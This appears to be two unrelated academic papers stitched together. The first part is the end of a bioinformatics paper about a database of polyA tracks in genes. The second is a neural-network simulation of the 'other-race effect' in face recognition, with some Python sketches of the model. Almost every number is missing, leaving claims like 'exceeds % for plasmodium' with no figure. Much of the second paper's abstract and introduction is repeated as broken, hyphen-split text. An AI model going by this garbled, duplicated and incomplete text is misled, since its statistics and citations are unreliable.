in the previous studies (koutmou et al., ; arthur et al., ) we focused mainly on polya tracks from the human and yeast genomes, using the ncbi (pruitt et al., ) database and sgd (cherry et al., ) as data sources, respectively. overall there is a good agreement between our previous analysis and this study for higher eukaryotes, while we see some discrepancies for lower eukaryotes such as yeast. for example, in the previous study we underestimated the number of polya-carrying genes in yeast by an order of magnitude ( vs. )—a result of the different data source. the percentage of polya-carrying transcripts varies from organism to organism and exceeds % for plasmodium species, well known for their at-rich genome (see table for a summary). however, the distribution of lengths of polya tracks is quite similar across the whole observed spectrum of at-content (fig. ). it might be that the single plasmodium genus is skewing the distribution, as the species distribution of genomic databases is heavily biased. in humans, only around % of transcripts, coming from ca. % of genes, carry a polya track and, as such, are subject to translational attenuation. this is close to the median across all analyzed genomes. furthermore, we did not find any correlation between organismal complexity and the number of polya-affected genes. this might indicate that such a feature is a constituent element of the translational machinery, unrelated to external factors and regulatory mechanisms.

figure : distribution of polya lengths vs. at-ratio of analyzed genomes. data for lengths of polya tracks were divided into bins distributed evenly across the spectrum of at-richness of the analyzed genomes. the width of a box is proportional to the number of observations in a particular bin. lines denote ∗iqr (interquartile range). outliers were removed for clarity. data start at a length of , as this was the length of the minimal pattern used.
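per-organism summaries like those in the table (share of polya-carrying transcripts, longest track, median across genomes) can be derived directly from per-transcript hits. the sketch below uses invented hit lists rather than real ensembl data, so all organism names, transcript ids and values are illustrative only.

```python
from statistics import median

# Hypothetical per-transcript polyA hits (track sequences) for two made-up organisms;
# in practice these lists would come from scanning each coding sequence.
hits = {
    "organism_a": {"tx1": ["AAAAAAAAAAAA"], "tx2": [], "tx3": ["AAAAAAGAAAAAAA"]},
    "organism_b": {"tx1": [], "tx2": ["AAAAAAAAAAAGA"], "tx3": []},
}

percentages = {}
for organism, transcripts in hits.items():
    carrying = sum(1 for tracks in transcripts.values() if tracks)
    percentages[organism] = 100.0 * carrying / len(transcripts)
    longest = max((len(t) for tracks in transcripts.values() for t in tracks), default=0)
    print(f"{organism}: {percentages[organism]:.1f}% polya-carrying transcripts, "
          f"longest track {longest} nt")

print("median percentage across organisms:", median(percentages.values()))
```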
software architecture

the main table consists of the protein common name, the gene and transcript ensembl ids, the location of the polya track expressed as a percentage (which allows for quick identification of cases where the polya track is either at the end or at the beginning of the protein) and, finally, the identified polya track with a context of the surrounding sequence. all columns are sortable. by default, the table is alphabetically sorted by protein name. sorting of gene and transcript ids is also alphabetical. location is sorted numerically. the rows with polya sequences are sortable by polya track length, so the user can quickly identify sequences with the longest track in a particular organism. obviously, due to the used pattern, the shortest polya tracks have a length of nucleotides. to facilitate quick interaction with tables, we have used the bootstrap-table library, which allows for easy and intuitive sorting and searching through all fields in a particular genome.

the project was created using python . . to parse biological data, we used biopython . . to compare protein and cdna sequences, we used a local version of the ncbi blast+ software v. . . . to run the web service, we used flask v. . . . we used the sqlite database engine and sqlalchemy for database access. to query the ensembl database, we used the mysql client. we also used two other python libraries: xmltodict and requests. the most difficult task was to ensure short page-load times given the large dataset on which we worked. to solve this problem, we created additional tables in the database which contain metadata for the heaviest queries. this solution decreased the loading time more than times. we have designed a two-step architecture. in the first step, we analyse data from the ensembl database and create our database with the a- pattern. in the second step, we use the created database to provide information to the web service. this architecture allows one to separate obtaining the data from running the web service; thus, during analysis of a new version of the ensembl data we can still provide data about the old version, and changes between versions can be effected in seconds without the user noticing. in the future, we will work on parallelizing the ensembl data analysis to speed up the first step. it is likely that polya segments are not the only sequence determinants of translation efficiency in coding sequences, and further studies will discover more such motifs or different lengths of the minimal polya pattern for a particular organism. the design of the patacsdb engine allows for easy modification towards finding and cataloguing novel sequence patterns.

additional information and declarations

funding: the authors received no funding for this work.

competing interests: the authors declare there are no competing interests.

author contributions
• malgorzata habich conceived and designed the experiments, performed the experiments, analyzed the data, contributed reagents/materials/analysis tools, wrote the paper, performed the computation work, reviewed drafts of the paper.
• sergej djuranovic conceived and designed the experiments, wrote the paper, reviewed drafts of the paper.
• pawel szczesny conceived and designed the experiments, performed the experiments, contributed reagents/materials/analysis tools, wrote the paper, reviewed drafts of the paper.
data availability

the following information was supplied regarding data availability: https://github.com/habich/patacsdb/.

references

arthur l, pavlovic-djuranovic s, smith-koutmou k, green r, szczesny p, djuranovic s. . translational control by lysine-encoding a-rich sequences. science advances ( ):e doi . /sciadv. .
brandman o, stewart-ornstein j, wong d, larson a, williams cc, li g-w, zhou s, king d, shen ps, weibezahn j, dunn jg, rouskin s, inada t, frost a, weissman js. . a ribosome-bound quality control complex triggers degradation of nascent peptides and signals translation stress. cell : – doi . /j.cell. . . .
chen j, petrov a, johansson m, tsai a, o'leary se, puglisi j. . dynamic pathways of − translational frameshifting. nature : – doi . /nature .
cherry jm, adler c, ball c, chervitz sa, dwight ss, hester et, jia y, juvik g, roe t, schroeder m, weng s, botstein d. . sgd: saccharomyces genome database. nucleic acids research : – doi . /nar/ . . .
cruz-vera lr, magos-castro ma, zamora-romo e, guarneros g. . ribosome stalling and peptidyl-trna drop-off during translational delay at aga codons. nucleic acids research : – doi . /nar/gkh .
dimitrova ln, kuroha k, tatematsu t, inada t. . nascent peptide-dependent translation arrest leads to not p-mediated protein degradation by the proteasome. the journal of biological chemistry : – doi . /jbc.m .
doma mk, parker r. . endonucleolytic cleavage of eukaryotic mrnas with stalls in translation elongation. nature : – doi . /nature .
flicek p, amode mr, barrell d, beal k, billis k, brent s, carvalho-silva d, clapham p, coates g, fitzgerald s, gil l, girón cg, gordon l, hourlier t, hunt s, johnson n, juettemann t, kähäri ak, keenan s, kulesha e, martin fj, maurel t, mclaren wm, murphy dn, nag r, overduin b, pignatelli m, pritchard b, pritchard e, riat hs, ruffier m, sheppard d, taylor k, thormann a, trevanion sj, vullo a, wilder sp, wilson m, zadissa a, aken bl, birney e, cunningham f, harrow j, herrero j, hubbard tjp, kinsella r, muffato m, parker a, spudich g, yates a, zerbino dr, searle smj. . ensembl. nucleic acids research :d –d doi . /nar/gkt .
koutmou ks, schuller ap, brunelle jl, radhakrishnan a, djuranovic s, green r. . ribosomes slide on lysine-encoding homopolymeric a stretches. elife :e doi . /elife. .
kuroha k, akamatsu m, dimitrova l, ito t, kato y, shirahige k, inada t. . receptor for activated c kinase stimulates nascent polypeptide-dependent translation arrest. embo reports : – doi . /embor. . .
letzring dp, dean km, grayhack ej. . control of translation efficiency in yeast by codon-anticodon interactions. rna : – doi . /rna. .
pruitt kd, brown gr, hiatt sm, thibaud-nissen f, astashyn a, ermolaeva o, farrell cm, hart j, landrum mj, mcgarvey km, murphy mr, o'leary na, pujar s, rajput b, rangwala sh, riddick ld, shkeda a, sun h, tamez p, tully re, wallin c, webb d,
weber j, wu w, dicuccio m, kitts p, maglott dr, murphy td, ostell jm. . refseq: an update on mammalian reference sequences. nucleic acids research :d –d doi . /nar/gkt .
shoemaker cj, green r. . translation drives mrna quality control. nature structural & molecular biology : – doi . /nsmb. .
yan s, wen j-d, bustamante c, tinoco jr i. . ribosome excursions during mrna translocation mediate broad branching of frameshift pathways. cell : – doi . /j.cell. . . .

connection science, , ( ), – .

simulating the "other-race effect" as a problem in perceptual learning

alice o'toole, the university of texas at dallas; ken deffenbacher, the university of nebraska at omaha; hervé abdi, the university of texas at dallas; jim bartlett, the university of texas at dallas.

we report a series of simulations on the well-known "other-race effect." we trained an autoassociative network on a majority and a minority race of faces, and tested the model's ability to process faces from the two races in different ways. first, the model was better able to reconstruct unlearned majority faces than minority faces. secondly, the average inter-face similarity was higher for the reconstructed minority faces than for the reconstructed majority faces, indicating that the model was coding the majority faces more distinctively than the minority faces. these results held for caucasian faces as the majority race and japanese faces as the minority race, and vice versa. thirdly, we simulated a recognition task for same- and other-race faces by using a face history matrix and a recognition task matrix with equal numbers of caucasian and japanese faces, and reconstructing these faces as a weighted combination of the two matrices. using caucasian faces as the majority race, the model was better able to discriminate learned from new caucasian faces than learned from new japanese faces. we discuss the results in terms of perceptual tuning to information useful for processing faces of a single race.

keywords: face memory, autoassociative memory, neural network, other-race effect.

acknowledgments: thanks are due to june chance and al goldstein for providing the caucasian and japanese faces used in the simulations, and to peter assmann, barbara edwards and two anonymous reviewers for helpful comments on an earlier version of this manuscript. this project was supported in part by national institute of aging grant ro -ag to j.c.b. send correspondence about this paper to hervé abdi: herve@utdallas.edu. home page: http://www.utdallas.edu/∼herve.

. introduction

for many years scientist and layperson alike have suspected that faces of one's own race are recognized more accurately than faces of another race. in the early part of the century, feingold ( , p. ) stated the supposition and a plausible reason for its existence this way: "other things being equal, individuals of a given race are distinguishable from each other in proportion to our familiarity, to our contact with the race as a whole. thus, to the uninitiated american all asiatics look alike, while to the asiatic, all white men look alike." more recently, it has been shown that approximately half of potential jurors believe that such a bias exists (deffenbacher & loftus, ). indeed, abundant empirical support for the own-race bias in face recognition accuracy can be found in the recent meta-analyses of a large number of studies
thirdly, we simulated a recognition task for same- and other-race faces by using a face history matrix and a recognition task matrix with equal numbers of caucasian and japanese faces, and reconstructing these faces as a weighted combination of the two matrices. using caucasian faces as the majority race, the model was better able to discriminate learned from new caucasian faces than learned from new japanese faces. we discuss the results in terms of perceptual tuning to information useful for processing faces of a single race. keywords:face memory, autoassociative memory, neural network, other-race effect. . introduction for many years scientist and layperson alike have suspected that faces of one’s own race are thanks are due to june chance and al goldstein for providing the caucasian and japanese faces used in the simulations, and to peter assmann, barbara edwards and two anonymous reviewers for helpful comments on an earlier version of this manuscript. this project was supported in part by national institute of aging grant ro -ag to j.c.b. send correspondence about this paper to hervé abdi: herve@utdallas.edu. home page: http://www.utdallas.edu/∼herve. recognized more accurately than faces of another race. in the early part of the century, feingold ( ,p. ) stated the supposition and a plausible reason for its existence this way other things being equal, individuals of a given race are distinguishable from each other in proportion to our familiarity, to our contact with the race as a whole. thus, to the uninitiated american all asi- atics look alike, while to the asiatic, all white men look alike. more recently, it has been shown that approxi- mately half of potential jurors believe that such a bias exists (deffenbacher & loftus, ). indeed, abundant empirical support for the own-race bias in face recognition accuracy can be found in the recent meta-analyses of a large number of studies o’toole, deffenbacher, abdi, & bartlett on the topic (shapiro & period, ; bothwell et al., ). several hypotheses have been advanced to ac- count for the cross-race phenomenon: faces of some races are inherently more difficult to identify than others; prejudicial attitudes lead to less ac- curate recognition for other-race faces; and other- race faces are processed more superficially than same-race faces. there is little support for any of these accounts (brigham, ). a fourth possi- bility is that implied by the quote from feingold ( ): an own-race bias is in direct proportion to the difference in amount of contact with persons of one’s own and another race. several studies have found a smaller other-race effect for persons living in more racially integrated circumstances (cross et al., ; feinman & entwistle, ). however, while at least one study (brigham et al., ) yielded a small but significant correlation of self-reported degree of cross-race contact and cross-race recognition ability, other studies (e.g. brigham & barkowitz, ) have found no rela- tionship at all. it may be, however, that current techniques are not sensitive enough to adequately assess the quan- tity and quality of contact with persons of another race. there are data which suggest that the cross- race effect may indeed be a matter of differen- tial exposure to faces of different races. for one thing, a number of attempts to improve same-race face recognition have all failed (malpass, ). however, similar training efforts for other-race face recognition have yielded improvements (e.g. goldstein & chance, ). 
we think that the differential effects of further training in face recognition are due to differen- tial amounts of perceptual learning associated with same versus other-race faces. a cross-sectional study of the development of face recognition abil- ity by chance et al. ( ) found that year old caucasian children show only a small cross-race effect recognizing japanese compared with cau- casian faces. at successively older ages up to early adulthood, ability to recognize both races in- creased, but ability to recognize same-race (cau- casian) faces increased much more rapidly. hence, any attempt to improve same-race face recogni- tion by short-term training programs may be inade- quate compared with years of extensive processing of same-race faces. studies examining the role of perceptual learn- ing in the other-race effect are difficult to carry out empirically for two reasons. first, while it may be possible to find subject populations with a relatively controlled “face-learning” history, it is generally not possible to equate the populations along other important cultural and social dimen- sions that may affect performance on the task. sec- ondly, as we have already noted, short-term per- ceptual learning studies involving practice with a single race of faces are not necessarily adequate to control for the lifetime experience of observers with faces of their own race. these methodological difficulties make the cross-race effect an ideal can- didate for simulation approaches to understanding the psychological data. in the present study, we present simulations of a perceptual learning account of the other-race ef- fect that is based on the following principles. first, we assume that faces of different races comprise different statistical categories of faces. secondly, within a given category of faces, a set of differen- tially weighted “features ” is optimal for encoding faces in a manner that makes faces within the cate- gory most discriminable. different feature sets and weightings, however, are optimal for processing faces from other-race categories of faces. thirdly, with exposure to many faces of a given race and a smaller number of faces of other races, perceptual learning enables observers to make optimal use of the features that are best for processing faces from the category with which they have had the most experience, topically, faces of their own race. by this account, the difficulties experienced with faces of another race are due to the fact that the optimal features for distinguishing faces of one’s own race are not optimal in processing the faces of another race. one way to simulate the other-race effect is to train an autoassociative network on different pro- portions of faces of an ’own’ and ’other’ race. we referred to in the face recognition literature simply as “experience.” the word features is used in its most general sense without commitment to a specific definition. simulating the other-race effect trained an autoassociative system on a large num- ber of faces of a majority race and a smaller num- ber of faces of a minority race to mimic the other- race effect. the advantages of an autoassociative memory used with widrow-hoff error correction is that it will develop connection weights in such a way as to optimize the storage capacity of the matrix. thus, with very similar stimuli, such as a single race of faces, the model should tune itself to the information important for processing faces from within the class. 
due to the distributed nature of the memory, when faces are retrieved from the system, they will be filtered by the learning history of the system. several predictions about the system's ability to process same- and other-race faces follow. first, when the network is trained on a majority of faces of one race and a minority of faces of another race, its ability to represent faces of the majority race should be better than its ability to represent faces from the minority race. this is because the model will have developed "features" that are more appropriate for faces of the majority race. we can assess the validity of this prediction by looking at the quality of face reconstructions for new (previously unencountered) faces of the majority and minority races. secondly, reconstructed new faces of the minority race should be more similar to one another than reconstructed faces of the majority race. in other words, the average inter-face similarity should be greater for reconstructed minority faces than for reconstructed majority faces. this is because the model will not develop a coding that makes optimal use of the distinguishing features for the minority race; hence, these faces should be "perceptually" more similar to one another. finally, the model should be better able to recognize majority faces than minority faces.

the simulations serve, first, to test the model qualitatively as a face recognition tool with a much larger and higher quality stimulus set than that used previously (kohonen, ; o'toole et al., ; o'toole & abdi, ). we will look specifically at the model's performance with respect to the predictions stated above. secondly, this type of model suggests a different definition of features than has previously been used to characterize faces. since the autoassociative memory can be decomposed into a set of eigenvectors, and since faces learned by the model can be reconstructed by the weighted combination of these eigenvectors, the eigenvectors may be thought of as features for characterizing the stimulus set. we should expect to see differences in eigenvectors based on the face history of the model. furthermore, since we used a simple visual code in these simulations, the eigenvectors can be displayed as images. we shall discuss the potential role of the eigenvectors as features for characterizing same- and other-race faces.

simulation

the model is defined first and then its application to the other-race problem is presented. a digitized image of each face was coded as a vector comprised of pixel elements concatenated from the rows of the face image. thus, the ith face was represented by a j × 1 vector (where j is equal to the width times the height of the face image in pixels) and is denoted by $f_i$. for convenience, normalized vectors are assumed (i.e., $f_i^T f_i = 1$). the autoassociative matrix was constructed as

$A = \sum_i f_i f_i^T$   (1)

recall of individual faces from the matrix was done according to the rule

$\hat{f}_i = A f_i$   (2)

where $\hat{f}_i$ is the system estimate of $f_i$. the quality of this estimate is measured by comparing the reconstructed image with the original image using the cosine of the angle between the vectors $\hat{f}_i$ and $f_i$. the widrow-hoff error-correction rule was applied iteratively to optimize the quality of the recall across the stimulus set

$A_{[t+1]} = A_{[t]} + \gamma \left( f_i - A_{[t]} f_i \right) f_i^T$   (3)

where i is randomly chosen and $\gamma$ decreases as the reciprocal of the iteration number.
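to make equations (1)-(3) concrete, the short python/numpy sketch below builds the autoassociative matrix, applies widrow-hoff error correction, and measures recall quality with the cosine between an original and a reconstructed vector. it is an illustration of the equations above, not the authors' original code; the random stand-in "faces", the number of sweeps, and the initial learning rate are arbitrary choices.

```python
import numpy as np

def normalize(f):
    # scale a face vector to unit length (the text assumes f_i^T f_i = 1)
    return f / np.linalg.norm(f)

def train_autoassociator(faces, sweeps=50, gamma0=0.05, seed=0):
    # hebbian start, eq. (1): A = sum_i f_i f_i^T
    A = sum(np.outer(f, f) for f in faces)
    rng = np.random.default_rng(seed)
    n = len(faces)
    t = 0
    for _ in range(sweeps * n):
        t += 1
        f = faces[rng.integers(n)]           # the face index i is chosen at random
        gamma = gamma0 / t                   # step size decays as the reciprocal of the iteration number
        A += gamma * np.outer(f - A @ f, f)  # eq. (3): widrow-hoff error correction
    return A

def recall(A, f):
    # eq. (2): the system's estimate of a face
    return A @ f

def cosine(a, b):
    # reconstruction quality: cosine of the angle between original and reconstruction
    return float(a @ b / (np.linalg.norm(a) * np.linalg.norm(b)))

# toy demonstration with random vectors standing in for pixel-coded faces
rng = np.random.default_rng(1)
faces = np.array([normalize(v) for v in rng.normal(size=(40, 256))])
A = train_autoassociator(faces)
print(cosine(faces[0], recall(A, faces[0])))  # high for a learned face
```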
since the eigen-decomposition of the autoasso- ciative matrix is equivalent to principal component analysis (abdi, ), the autoassociative matrix o’toole, deffenbacher, abdi, & bartlett figure . mean cosines between original and reconstructed images for the old and new majority and minority faces. simulating the other-race effect can give indications of the statistical structure of the stimulus set. the storage capacity of such a matrix is approximately % of its dimensionality for random vectors (hopfield, ). since the di- mension of our images was very large by compar- ison with the number of stimuli, this limit was not a problem for these simulations. method stimuli. a total of caucasian and japanese faces were digitized from slides with a resolu- tion of grey levels using a fotovix digitizer attached to a -based computer with a -bit targa board (true vision). faces were of young adults and were roughly half male and half female. none of the slides pictured people with facial hair or glasses. the images were aligned so that the eyes were at about the same height. the images were cropped around the face to eliminate cloth- ing. each face was pixels wide and pix- els long, and so was represented by a -pixel vector consisting of the concatenation of the pixels rows. a spatial differentiation encoding was used to enhance lines prior to the extraction of the pixel vector (cf. o’toole et al., ). the simulations were carried out on a sun microsystems sparcsta- tion and on a convex c- vector computer. procedure. two simulations of the other-race effect were performed: one used caucasian faces as the majority race and japanese faces as the mi- nority race, and the other used japanese faces as the majority and caucasian faces as the minority group. for the japanese minority simulation, an associative memory was trained using error correc- tion on caucasian and five japanese faces. for the caucasian minority simulation japanese and five caucasian faces served as the training set . results and discussion representations of majority and minority race faces. the model was tested by reconstructing the japanese and caucasian faces that the model learned (old), and by reconstructing a sample of japanese and caucasian faces not learned by the model (new). the cosine between the origi- nal and reconstructed image indicates the quality of the model’s representation of the face. fig- ure shows the mean cosines for the old and new majority and minority faces for the simu- lations. three points are worth noting. first, in both simulations, the old stimuli (both cau- casian and japanese faces) were nearly perfectly reconstructed (mean cosine= . ). this is a con- sequence of the fact that the capacity of the matrix was not challenged (cf. hopfield, , and be- low). we discuss below one method of degrading the performance of the model in a psychologically interesting way. secondly, the average cosine for the reconstructed new majority faces was greater than the average cosine for the reconstructed new minority faces. this can be seen in the interaction in figure . the differences between the quality of the reconstructions for majority and minority faces reflects the model’s greater success in coding or representing novel faces from the majority race than from the minority race. finally, in both simulations, the cosines for the new faces did not reflect random performance for the model. in other words, the minority race faces were not completely unfamiliar stimuli for the model. 
this is a consequence of the fact that all faces share a general schema of features, and so a given race might be best thought of as a subcategory of the general class of face stimuli.

similarity. we tested the prediction that novel majority faces are perceived by the model to be less similar to one another (i.e., more distinctive) than minority faces. an analysis of the similarity of the reconstructed new faces to one another was carried out. in this analysis, randomly chosen new caucasian faces and randomly chosen new japanese faces were reconstructed, and the model's estimate of each face was used for this similarity analysis. these stimuli can be thought of as filtered or "perceived" by the matrix trained with a majority and minority race. (the choice of % majority and % minority faces is arbitrary. we have carried out the first set of simulations with % and % as well, and have found qualitatively similar, though less extreme, results for the model's ability to represent new majority and minority race faces.) for each race of faces, the inter-face similarity for the recalled faces was calculated by taking the cosine between all possible pairs of different 'perceived' faces. the cosine between two faces indicates the similarity between the two, with identical or scaled faces yielding cosines of 1.0. the average similarity of all possible pairs of reconstructed faces was taken as the average inter-face similarity.

several conditions were analyzed. for each majority simulation, the average inter-face similarity of caucasian and japanese faces was computed. furthermore, the reconstructions were carried out using different numbers of eigenvectors to look at the consistency of the similarity effects. to explain this latter analysis, a short digression into the properties of associative matrices is necessary. the reconstruction of any face from the autoassociative matrix can be achieved either by equation (2) or, equivalently, by taking a weighted sum of the eigenvectors of the matrix a, where the weight of each eigenvector for a face $f_i$ is equal to the dot-product between the face vector and the eigenvector (multiplied by the eigenvalue of the eigenvector when error correction is not being used, since error correction has the effect of equalizing the eigenvalues). for these simulations, error correction was used and so the eigenvalue was not included in the weights. thus, the reconstruction is given by

$\hat{f}_i = (f_i \cdot e_1)e_1 + (f_i \cdot e_2)e_2 + \cdots + (f_i \cdot e_\ell)e_\ell + \cdots + (f_i \cdot e_n)e_n$   (4)

where $e_\ell$ indicates the ℓ-th eigenvector. the reconstruction of each face, then, can be quantified precisely by this list of coefficients and the set of eigenvectors of a. returning from our digression, it is clear that a face may be recalled using this second procedure with all or any subset of eigenvectors. since eigenvectors can be ordered by importance of contribution using their associated eigenvalues, we recalled faces using different numbers of eigenvectors to test the consistency of the results as more eigenvectors were included. the results of this analysis appear in figure (a) for the caucasian majority simulation and in figure (b) for the japanese majority simulation. average inter-face similarity, as defined by the average cosine between all possible pairs of reconstructed faces (as coded by the set of coefficients used to reconstruct them), appears on the y axis, and the number of eigenvectors is plotted on the x axis.
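the eigenvector-based recall of equation (4) and the average inter-face similarity measure can likewise be sketched in a few lines of python. this is an illustrative reconstruction, not the original analysis code; the number of retained eigenvectors is arbitrary, and the matrix is symmetrized before the eigen-decomposition to guard against small asymmetries left by the error-correction updates.

```python
import numpy as np
from itertools import combinations

def top_eigenvectors(A, k):
    # symmetrize, then keep the k eigenvectors with the largest eigenvalues
    vals, vecs = np.linalg.eigh((A + A.T) / 2.0)
    order = np.argsort(vals)[::-1][:k]
    return vecs[:, order]                      # columns are e_1 ... e_k

def reconstruct(face, E):
    # eq. (4) truncated to the retained eigenvectors: f_hat = sum_l (f . e_l) e_l
    coeffs = E.T @ face                        # one coefficient (f . e_l) per eigenvector
    return E @ coeffs, coeffs

def mean_inter_face_similarity(coeff_list):
    # average cosine over all pairs of reconstructed faces, coded by their coefficients
    cosines = [a @ b / (np.linalg.norm(a) * np.linalg.norm(b))
               for a, b in combinations(coeff_list, 2)]
    return float(np.mean(cosines))

# usage sketch (A and the new face vectors would come from the training code above):
# E = top_eigenvectors(A, k=20)
# coeffs = [reconstruct(f, E)[1] for f in new_faces_of_one_race]
# print(mean_inter_face_similarity(coeffs))
```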
in both simulations, faces from the minority race were more similar to one another on the average than were faces in the majority race. thus, when the model is trained on a majority of faces of one race and a minority of faces of another race, it cre- ates more distinct codings of majority race faces. this finding is reminiscent of feingold’s ( ) quote. simulation as previously noted, the capacity of an autoas- sociative memory without error correction can be estimated as approximately % of its dimension- ality. this estimate assumes random vectors. the vectors we used were of dimensionality and so the capacity of the memory should be roughly faces. while there are two differences be- tween these simulations and those for which the capacity estimates were derived, these have inverse effects on the capacity estimates. first, we used error correction, which improved the capacity of the matrix. secondly, faces are not random vectors but are highly correlated, a factor that lessens the capacity. in any ease, it is clear from simulation that faces did not challenge the capacities of the matrix. since we had a limited data base of faces, we explored a number of methods for de- grading the system’s performance. at least one of these is interesting psychologically and would merit attention regardless of the performance con- straints. this method draws on the metric multidi- mensional sealing analogy cited previously. multidimensional scaling tries to represent space relations between entities of a stimulus set in the smallest dimensional space possible while accounting for some experimenter-set criterion of variance. the eigenvectors of an associative mem- a strong analogy with metric multidimensional scaling is present here. the axes or dimensions of met- ric multidimensional scaling solutions are the eigen- vectors ordered by the magnitude of their associated eigenvalues. thus, the first axis is the first eigenvec- tor, etc. typically, multidimensional scaling solutions use as many axes as are needed to account for some experimenter-specified proportion of variance. simulating the other-race effect figure . average inter-face similarity for the (a) caucasian and (b) japanese majority ( %) simulations, plotted as a function of the number of eigenvectors used to reconstruct the faces. the minority ( %) race faces for both simulations are more similar to one another than are faces in the majority race. o’toole, deffenbacher, abdi, & bartlett ory are equivalent to the axes of a multidimen- sional scaling solution, with the eigenvector with the largest positive eigenvalue accounting for the largest proportion of variance, and the eigenvector with the second largest eigenvalue accounting for the second largest proportion of variance, and so on. the maximum number of dimensions needed to account for all of the variance is equal to the rank of the matrix (i.e. the number of eigenvectors with non-zero eigenvalues). frequently in multi- dimensional scaling, however, an acceptably large proportion of the variance may be accounted for by a very small set of dimensions and, thus, the eigenvectors with smaller eigenvalues may be dis- carded without losing much information about the structure of the stimulus set. likewise, recall from an associative memory can be carried out using a smaller number of eigen- vectors (cf. equation ( )). the criterion for an ac- ceptable number of dimensions in this case, how- ever, is one that maintains an acceptable (but not perfect) level of recognition performance. 
recognition memory for same- and other-race faces to simulate a recognition memory task we need to model two components of memory, a long-term experience component (i.e. face race history) and a short-term face recognition task. we expect expe- rience to affect the short-term recognition task in the ways outlined above. for the purpose of com- pleteness, we report two simulations. in the first, we tested the ability of the autoassociative memory to distinguish between old and new faces for a majority matrix. in the second, we added a short- term component to this matrix, which consisted of half caucasian and half japanese faces. we then examined the ability of the model to discriminate old from new faces for these additional faces. we should note that we do not believe that this is the only or even best way to simulate such a task. we feel that it is the simplest way, however, and so we chose to explore this method first. method the matrix was tested for accuracy with a yes/no procedure as follows. learned caucasian and japanese faces (old) and new caucasian and japanese faces were reconstructed. the qual- ity of the reconstructions was measured as the co- sine between the original and reconstructed im- ages. a yes/no recognition procedure was imple- mented by setting a criterion cosine value β and by assigning a ‘yes’ to faces for which the cosine between the original and reconstructed image ex- ceeded the criterion and ‘no’ to faces for which the cosine was less than the criterion β. the most direct choice for β is the mean of the cosine dis- tribution means for the reconstructed old faces and the reconstructed new faces. signal detec- tion methodology maps easily onto this yes/no task since the distribution of cosines for old faces can be thought of as the signal distribution and the distribution of cosines for new faces as the noise distribution. old faces with cosines greater than β are considered hits and new faces with cosines greater than β are considered false alarms. a d′ score may then be computed in the standard way. also, since the distribution of cosines for the signal (i.e. the old faces) and the distribution of cosines for the noise (i.e. the new faces) are known com- pletely, a roc curve may be plotted by choosing β values and calculating the hit and false alarm rates that would result from using these different crite- ria. results and discussion to test the accuracy of the models, we used all of the old faces ( faces: majority and five minority) and a sample of new faces, approx- imately half japanese and half caucasian. the ac- curacy of the model using all the eigenvectors was essentially perfect. we degraded the simulations, therefore, by using smaller numbers of eigenvec- tors. figure (a and b) displays roc curves for the performance of the caucasian and japanese majority models, respectively, with three different numbers of eigenvectors contributing to the recon- struction. for both majority simulations, eigen- vectors yielded excellent performance. dividing the faces into majority and minority face groups did not show the cross-race effect. that is, major- ity faces did not yield larger values of d′. this is likely to be due to the fact that only five minority- simulating the other-race effect figure . roc curves for the performance of the (a) caucasian and (b) japanese majority ( %) models. perfor- mance is plotted with different numbers of eigenvectors contributing to the reconstructions. o’toole, deffenbacher, abdi, & bartlett figure . 
roc curves for the long-term experience and short-term recognition caucasian majority matrix. race faces were used in these simulations and that race was probably the largest category difference in these simulations and is, therefore, likely to be represented in the first few eigenvectors. we then simulated the short-term component by recalling faces combining the eigenvectors from the long-term majority matrix and the short-term half-caucasian (n = ) and half-japanese (n = ) matrix, weighting the long-term component at . and the short-term component at . . we report a simulation only for the caucasian major- ity matrix . here we see the classic cross-race ef- fect, with the japanese faces being more difficult to recognize (i.e. to separate old from new in the short-term recognition task) than the caucasian faces. the roc curves for this simulation are dis- played in figure . the eigenvectors as features. recalling faces from the autoassociative matrix is carried out by summing together a weighted combination of eigenvectors. that is, the faces are ‘put together’ by adding up the eigenvectors in differentially weighted combinations. as such, by most psycho- logical definitions, the eigenvectors can be thought of as features of the faces. this interpretation of eigenvectors in associative matrices has been pointed out by anderson et al. ( ). also, in the context of low-dimensional representation of images, sirovitch & kirby ( ) suggest an these numbers are arbitrary and are simply an at- tempt to give more weight to the long-term experience than the short-term recognition task. this is because we do not yet have a sufficient number of japanese faces available to complete the analysis for the japanese faces. simulating the other-race effect figure . (a) the first four eigenvectors for the caucasian majority simulation. o’toole, deffenbacher, abdi, & bartlett figure . (b) (b) the first four eigenvectors for the japanese majority simulation. simulating the other-race effect eigenvector-based description. applied to the current work, the eigenvectors of a matrix of face images are a different sort of feature than has generally been used in describ- ing faces. for one thing, the eigenvectors repre- sent global and not local features, since they span the face. secondly, with the exception of the first eigenvector in each of these simulations, the eigen- vectors are not readily interpretable in a traditional feature sense. the first four eigenvectors for the caucasian majority simulation and the japanese majority simulation are displayed in figure (a and b). it should be noted that the eigenvectors are face-like. furthermore, the eigenvectors resemble somewhat the majority race of the matrix. the first eigenvector contains characteristics typical of the majority race (e.g. note the roundness of the eyes and face in the caucasian majority eigenvectors, and the squareness of the face and distinctiveness of the nostrils for the japanese majority eigenvec- tors). finally, for completeness, figure shows the first eigenvector of each majority matrix made from a pixel-based code without spatial differen- tiation. the race differences are even more strik- ing in these cases since shading information is pre- served. general summary and discussion the purpose of these simulations was to model some common effects associated with processing other-race faces. 
we have tried to show that these effects can be modeled, in part, as a process of fine tuning to the information most useful for distin- guishing faces within a homogenous set (i.e. a sin- gle race of faces). this tuning is suboptimal for processing other-race faces, however, and the sys- tem shows a number of shortcomings for the mi- nority faces as compared to the majority faces. our simulations produced three results. first, when the face history of a network was strongly biased to- ward a single race of faces, the model’s ability to represent novel faces from this race exceeded its ability to represent faces from another race. sec- ondly, an autoassociative network trained on a ma- jority race produced codings that were more sim- ilar to one another for faces of the minority race than for faces of the majority race. this simulates the well-known effect of faces of another race all appearing similar to one another. finally, by com- bining a long-term face history experience matrix with a short-term recognition matrix, we simulated the other-race effect with majority faces being bet- ter recognized than minority faces. while the system produced a number of effects that are qualitatively similar to those seen in the psychological literature, we caution that this ap- proach is perhaps best thought of, not as a model of face recognition, but as an exploratory tool for quantifying and processing subtle perceptual infor- mation in complex images such as faces. it is also, not the only approach to simulating the other-race effect. used in this context, it provides a method for examining other kinds of codings that might account for these effects in a similar fashion. fur- thermore, its application might give insight into the constraints that extensive experience with a given stimulus category place on the processing of stim- uli from another category. we think that this is especially important in cases where it is difficult to quantify the subtle visual information that sepa- rates the categories. finally, we think the model also has potential as a tool for simulating some other well-known ef- fects in face memory, such as the relationship be- tween typicality and recognition memory. further- more, it might be useful for giving insight into the perceptual components of the recognition difficul- ties encountered with inverted faces and with faces presented in the photographic negative. for these effects, it is instructive to pursue some simple per- ceptual explanations before looking at 